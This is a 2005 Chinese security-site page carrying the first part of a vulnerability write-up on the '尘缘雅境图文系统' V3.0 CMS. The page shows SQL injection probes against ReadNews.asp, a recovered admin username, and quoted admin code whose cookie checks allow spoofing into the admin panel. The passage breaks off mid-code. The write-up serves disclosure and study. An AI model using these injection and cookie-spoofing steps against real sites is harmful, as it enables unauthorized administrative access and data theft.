设为首页  
联系我们  
加入收藏  
网页制作 冲浪宝典 图形图像 操作系统 软件教学 编程开发 认证考试 安全技术 站长专区 文学驿站 娱乐天地 游戏天地 办公软件
文章搜索
您的位置: 首页 >> 文章首页 >> 安全技术 >> 病毒漏洞 >> 尘缘雅境图文系统存在严重漏洞
精品推荐
病毒漏洞点击TOP10
·动网论坛上传文件漏洞
·常用几种软件密码破解的方法
·尘缘雅境图文系统存在严重漏洞
·Raw Socket(原始套接字)实现Sniffer(嗅探)
·远程线程注入版获取SYSTEM权限
·“艾妮”(ANI)病毒解决方案
·如何成为一名黑客(附FAQ)
·能开启摄像头偷窥隐私的病毒
·解决DF冰点不修改NTLDR,最后一次正确配置的问题
·CGI漏洞
安全技术点击TOP10
·主板芯片级维修技术资料
·Symantec AntiVirus防病毒服务器安装配置使用指南
·教你如何手动查杀“幽灵(I-Worm.Ghost)”病毒
·贴片元件标记对应型号资料
·主板芯片组详解
·在WindowsXP/2003下查看端口对应的进程
·主板点不亮(不显示)的BIOS修复两法
·计算机启动过程详解
·网吧如何禁止使用PP点点通
·主板开机原理
精选专题

尘缘雅境图文系统存在严重漏洞

作者: 来源:网络文章 时间:2005-12-17 23:58:28

尘缘雅境图文系统存在严重漏洞(1)

[前言]
“尘缘雅境图文系统“ 
是由杨正炎、雪域一线天独立开发的系统,虽然没有动网的影响大,但是作为一个免费的全站系统,拥有强大的后台功能,还是受很多人青睐的,包括一个很有名气的书盟。因为学院网站用的最新V3.0 
Access版 build 
20030123,同学让测试一下(其实服务器的安全就很垃圾),没想到漏洞多多!小弟第一次写文章,废话很多,,见谅!马上进入正题!
[涉及版本]
“尘缘雅境图文系统V3.0 ACCESS版 build 20030123(因为时间的关系偶没有测试别的版本!
[描述]
很多地方没有对用户身份进行有效验证,最严重的可以通过COOKIE欺骗直接进入管理页面。还有就是大家很熟悉的跨表查询了。
[具体如下:]
因为很多地方都存在相同的漏洞,我们还是以通过COOKIE欺骗直接进入管理页面为例,危害大嘛,呵呵!:)
首先我们利用跨表查询获得管理员的用户名。为什么?看下文。
http://www.yourname.com/ ;ReadNews.ASP?NewsID=1’
返回 [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误
没有对特殊符号过滤,GO ON!
http://www.yourname.com/ ;ReadNews.asp?NewsID=1 and 1=(select id from 
admin)
正常显示
……省略若干次尝试(不要告诉我你不会跨表查询 :( )
得到管理员用户名:mereor
好了,看admin/index.asp
<%dim jingyong
set rs=server.createobject("adodb.recordset")
sql="select * from admin where 
username="&Request.cookies("username")&""
rs.open sql,conn,1,3
jingyong=rs("jingyong")
rs.close
set rs=nothing
if Request.cookies("key")="super" or Request.cookies("key")="check" 
or Request.cookies("KEY")="bigmaster" or 
Request.cookies("KEY")="smallmaster" or 

共2页 9 7 [1] [28 :>

尘缘雅境图文系统存在严重漏洞 相关文章:
尘缘雅境图文系统存在严重漏洞 相关软件:
特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
转载请注明来源:http://www.xgdown.com